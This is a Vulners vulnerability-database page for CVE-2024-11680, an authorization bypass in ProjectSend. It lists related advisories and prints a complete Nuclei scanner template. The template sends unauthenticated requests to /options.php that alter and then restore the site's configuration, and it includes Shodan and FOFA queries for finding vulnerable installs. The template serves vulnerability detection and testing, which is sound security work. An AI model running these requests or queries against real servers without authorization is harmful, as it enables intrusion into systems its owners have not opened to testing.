| Reporter | Title | Published | Views | Family All 24 |
|---|---|---|---|---|
| Exploit for Missing Authentication for Critical Function in Projectsend | 31 Mar 202612:10 | – | githubexploit | |
| Exploit for Improper Authentication in Projectsend | 4 Dec 202418:42 | – | githubexploit | |
| CVE-2024-11680 | 26 Nov 202400:00 | – | attackerkb | |
| The vulnerability of the ProjectSend file-sharing software is related to deficiencies in the authentication process, which allows attackers to modify the application’s configuration. | 29 Nov 202400:00 | – | bdu_fstec | |
| CVE-2024-11680 | 21 Nov 202417:59 | – | circl | |
| ProjectSend Improper Authentication Vulnerability | 3 Dec 202400:00 | – | cisa_kev | |
| CISA Adds Three Known Exploited Vulnerabilities to Catalog | 3 Dec 202412:00 | – | cisa | |
| ProjectSend 安全漏洞 | 26 Nov 202400:00 | – | cnnvd | |
| CVE-2024-11680 | 26 Nov 202409:55 | – | cve | |
| CVE-2024-11680 ProjectSend Unauthenticated Configuration Modification | 26 Nov 202409:55 | – | cvelist |
id: CVE-2024-11680
info:
name: ProjectSend <= r1605 - Improper Authorization
author: DhiyaneshDK
severity: critical
description: |
An improper authorization check was identified within ProjectSend version r1605 that allows an attacker to perform sensitive actions such as enabling user registration and auto validation, or adding new entries in the whitelist of allowed extensions for uploaded files. Ultimately, this allows to execute arbitrary PHP code on the server hosting the application.
impact: |
Unauthenticated attackers can bypass authorization checks to perform sensitive actions such as enabling user registration, modifying whitelists, and ultimately achieving remote code execution.
remediation: |
Upgrade ProjectSend to version r1700 or later.
reference:
- https://www.projectsend.org/
- https://www.synacktiv.com/sites/default/files/2024-07/synacktiv-projectsend-multiple-vulnerabilities.pdf
- https://vulncheck.com/advisories/projectsend-bypass
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2024-11680
cwe-id: CWE-287,CWE-863
epss-score: 0.91559
epss-percentile: 0.998
cpe: cpe:2.3:a:projectsend:projectsend:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
vendor: projectsend
product: projectsend
shodan-query:
- http.html:"projectsend"
- http.html:"projectsend setup"
- http.html:"provided by projectsend"
fofa-query:
- body="projectsend"
- body="projectsend setup"
- body=provided by projectsend
google-query: intext:provided by projectsend
tags: cve,cve2024,projectsend,auth-bypass,intrusive,kev,vkev,vuln
variables:
string: "{{randstr}}"
flow: http(1) && http(2) && http(3) && http(4) && http(5)
http:
- raw:
- |
GET / HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- 'status_code == 200'
- 'contains(body, "projectsend")'
condition: and
internal: true
extractors:
- type: regex
name: csrf
group: 1
regex:
- 'name="csrf_token" value="([0-9a-z]+)"'
internal: true
- type: regex
name: title
group: 1
regex:
- '<title>Log in » ([0-9a-zA-Z]+)<\/title>'
internal: true
- raw:
- |
POST /options.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
csrf_token={{csrf}}§ion=general&this_install_title={{string}}
matchers:
- type: dsl
dsl:
- 'status_code == 500'
- 'contains(content_type, "text/html")'
condition: and
internal: true
- raw:
- |
GET / HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- 'status_code == 200'
- 'contains(body, "{{string}}")'
condition: and
internal: true
- raw:
- |
POST /options.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
csrf_token={{csrf}}§ion=general&this_install_title={{title}}
matchers:
- type: dsl
dsl:
- 'status_code == 500'
- 'contains(content_type, "text/html")'
condition: and
internal: true
- raw:
- |
GET / HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- 'status_code == 200'
- 'contains(body, "{{title}}")'
condition: and
# digest: 4a0a00473045022052eaeabb80bde6832d8e000974e2426dc79b4fbc95198e8442e4857c4d3434ce022100b64f7f3b9cd2e5b36ff40180f751eea1dfa8ee426d1e46eca0275993ee1a1e22:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation